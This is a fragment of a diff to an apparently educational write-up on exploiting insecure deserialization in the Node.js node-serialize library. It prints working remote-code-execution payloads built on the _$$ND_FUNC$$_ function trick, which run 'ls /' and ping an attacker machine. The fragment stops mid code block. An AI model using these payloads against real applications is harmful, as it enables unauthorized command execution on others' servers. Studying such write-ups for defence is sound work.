aykhanmv/icsd_node_serialize_writeup/Writeup.md

 {"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}
 ```

-To adapt this payload for our target application, we need to remove the dictionary structure, enclosing double quotes, and any escaped characters, keeping only the core payload.
+To adjust the payload for our target application, we need to strip away the dictionary structure, remove enclosing double quotes, escape characters, leaving only the core payload.

-To test if the payload works, we can attempt to ping our attacking machine and verify whether the command executes.
+To test if the payload works, we can attempt to ping our attacking machine and verify whether the injected system command is executed.
 To detect the ping requests, start a ```tcpdump``` on the attacker machine to monitor ICMP traffic.

 ```javascript
 _$$ND_FUNC$$_function (){require('child_process').exec('ping <attacker IP> -c 3', function(error, stdout, stderr) { console.log(stdout) });}()